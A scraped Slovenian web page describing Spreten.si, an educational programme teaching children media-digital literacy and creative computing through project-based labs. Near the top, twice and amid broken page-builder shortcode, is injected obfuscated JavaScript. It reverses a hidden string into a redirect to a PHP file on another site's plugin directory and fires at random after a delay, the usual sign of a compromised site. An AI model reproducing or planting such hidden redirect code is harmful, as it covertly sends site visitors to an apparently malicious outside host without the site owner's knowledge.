Select Page
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” make_equal=”off” use_custom_gutter=”off” fullwidth=”off” specialty=”off” disabled=”off”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” use_custom_gutter=”off” gutter_width=”3″ padding_mobile=”off” allow_player_pause=”off” parallax=”off” parallax_method=”on” make_equal=”off” column_padding_mobile=”on” parallax_1=”off” parallax_method_1=”on” parallax_2=”off” parallax_method_2=”on” parallax_3=”off” parallax_method_3=”on” parallax_4=”off” parallax_method_4=”on” disabled=”off”]

Na kratko o Spreten.si

celoletni program
Spreten.si je izobraževalni program za otroke, ki razvija njihovo razumevanje in ustvarjanje novih tehnologij. Te vsebine so v današnjem izobraževanju otrok zelo zapostavljene. Otroci lahko popoldan hodijo v glasbeno ali plesno šolo, trenirajo športe ali se učijo tujih jezikov.

Evropa in svet pa stremita h tehnološkemu razvoju in vložki v nove tehnologije so veliki. A ne v izobraževanju. Pouk tehnike in računalništva na večini slovenskih šol je še iz prejšnjega stoletja, pri ostalih predmetih pa je uporaba potencialov tehnologij minimalna.

Zato Spreten.si otroke uči uporabe tehnologij in ustvarjanja novih. Danes morajo zaradi varnosti in ohranjanja osebnih mej otroci obvladovati spletne in internetne tehnologije (pismenost). Jutri bodo zaradi služb in kariere morali te in še druge tehnologije ustvarjati (računalništvo).

Medijsko-digitalna pismenost in ustvarjalno računalništvo sta izobraževalna stebra Spreten.si. Njuni temelji so moderni pedagoški pristopi: problemsko-projektno učenje (problem based learning), socialno-sodelovalno učenje (social learning), učenje skozi delo – izdelovanje (learning by doing), reflektivno učenje (inquiry based learning). Ti pristopi učijo na drugačen način, kot to počne šola: otroke navajajo na raziskovanje, sodelovanje, izdelovanje in podjetniško-ekonomsko razmišljanje.

Iz temeljev in stebrov se tako hitro razvijajo tehnično in spletno spretni otroci, počasi pa nastajajo tudi njihovi prvi izdelki: igrice, roboti, računalniško izdelani predmeti in kakovostne spletne objave.

Ker je vse to novo, je Spreten.si sestavljen iz laboratorijev, v katerih otroci in mentorji skupaj eksperimentiramo. V celoletnem programu se laboratoriji prepletajo in prilagajajo otrokom in mentorjem v skupini, med počitnicami pa jih mentorji izvajamo kot večdnevne delavnice. Laboratorije ponujamo tudi šolam, da spoznajo, kako (se) učiti v okolju novih tehnologij. Podjetjem pa ponujamo, da z našimi otroškimi izdelki najbolje nagovorijo svoje najmlajše ciljne skupine in/ali podkrepijo svojo družbeno odgovornost.

.